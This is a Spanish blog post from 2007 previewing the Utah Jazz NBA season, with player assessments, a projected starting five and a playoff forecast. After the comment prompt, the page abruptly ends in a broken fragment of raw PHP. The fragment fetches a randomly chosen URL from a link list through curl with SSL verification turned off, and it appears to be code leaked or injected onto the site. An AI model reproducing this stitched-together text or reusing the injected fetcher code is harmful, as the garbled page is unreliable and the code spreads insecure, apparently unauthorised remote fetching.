Utah Jazz: la confirmación

21 de September de 2007 por txusma

Deron WilliamsNi en los sueños más húmedos de los aficionados de los Jazz aparecían al principio de la temporada pasada unas finales de conferencia. Todos sabemos lo que es capaz de hacer Jerry Sloan con sus equipos, pero si alguien al empezar el curso situaba a los de Salt Lake City como uno de los cuatro mejores equipos de la NBA, ahora se merecería ser considerado vidente o, al menos, brillante analista.

Ya desde el principio de temporada las cosas funcionaron y su récord de 12 partidos ganados y tan sólo 1 perdido lucía como uno de los mejores de toda la NBA. Comandados por unos brillantísimos Deron Williams y Carlos Boozer, los Jazz cuajaron un gran año que terminó con la eliminación en las Finales de Conferencia a manos de unos Spurs a los que desgraciadamente no pudieron dar toda la guerra que hubieran deseado.

En el aspecto negativo queda la actuación de Andrei Kirilenko que, después de 3 años siendo referencia de su equipo y cumpliendo con creces, tuvo que compartir galones desde principio de temporada con Williams, Boozer y Okur. El ruso pareció no encajar bien la nueva situación y entró en una espiral de mal juego, apatía y desánimo que continuó hasta la eliminación en los Playoffs. Los rumores sobre posibles traspasos (se comenta la posibilidad de un intercambio con Shawn Marion) han continuado todo el verano mientras un Kirilenko hipermotivado ganaba para Rusia el oro del Europeo, demostrando que sigue siendo el jugador polifacético y brillante de anteriores temporadas.

Pero si en la plantilla de los Jazz ha de existir un jugador considerado clave en esta temporada que se avecina ése es, sin duda, Deron Williams. El de Illinois cuajó un año excelente subiendo un peldaño más su rendimiento en el campo. Demostró una visión de juego y una inteligencia excepcionales que abren un debate sobre quien es o será el mejor base del draft del 2005, en dura pugna con Chris Paul. Este año Deron puede encaramarse definitivamente al grupo de grandes bases si sigue demostrando la misma solvencia a la hora de dirigir a su equipo y lo lleva a cotas como mínimo igual de altas que el año anterior.

Sin traspasos ni fichajes sonados, el eje vertebral se completa con Carlos Boozer, Mehmet Okur y Andrei Kirilenko. Boozer ha jugado la mejor temporada de toda su carrera justo cuando algunos ya dudaban de su rendimiento tras un primer año en Utah decepcionante, y se ha convertido en todo un bastión dentro de la zona de los Jazz y acabado el año con una media de más de 26 puntos y 11 rebotes por partido. Además, se complementa perfectamente con su compañero en el juego interior, el turco Mehmet Okur, a priori más anotador, capaz de abrirse y tirar de 3 con relativo acierto. A estos 2 jugadores se les debería unir Kirilenko. Si Utah consigue introducir en el sistema al ruso y reclutarlo para la causa se convertirán en un equipo temible con multitud de recursos en ataques y grandes capacidades defensivas. Falta por ver si Kirilenko querrá comprometerse con el proyecto o si por el contrario, si no hay traspaso, seguirá pululando por la pista como la pasada temporada. Por el momento Andrei ya ha declarado que no se siente cómodo en el equipo de Jerry Sloan, lo que no es precisamente un buen comienzo.

 El año pasado Derek Fisher completó el quinteto de los Jazz pero este año se ha marchado a Los Angeles Lakers con lo que el puesto de SG queda muy abierto. En el draft eligieron a Morris Almond, un escolta llegado tras cuatro años en la Universidad de Rice que no se espera que entre, de buenas a primeras, en los planes de Jerry Sloan. Lo más probable es que sea finalmente Matt Harpring el que acabe completando el quinteto y recuperando la condición de titular que perdió hace 2 temporadas.

En el banco, aparte del rookie Almond, aparecen como jugadores destacados un clásico como Gordan ‘Metralleta’ Giricek, que sigue ejerciendo de especialista anotador, y Paul Millsap, agradable sorpresa de la temporada pasada y un PF que puede suplir con garantías los momentos de descanso o las bajas de Okur y Boozer. Además, se prevé que el número 14 del draft de 2006, Ronnie Brewer, que ahora que ha perdido su condición de rookie y que juega en la posición a priori más débil del quinteto, cuente con más minutos de la mano de Jerry Sloan.

Los Jazz son, sin duda, uno de los equipos a tener en cuenta en esta temporada que comienza. Conservan los mimbres que el año pasado formaron un equipo ganador y aún se puede esperar la mejoría que comporte una posible nueva actitud de Kirilenko o los jugadores que lleguen en un posible traspaso con el ruso de por medio.

 

Quinteto: Deron Williams, Matt Harpring, Andrei Kirilenko, Mehmet Okur, Carlos Boozer
6º Hombre: Gordan Giricek

Pronóstico: Semifinales de Conferencia

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>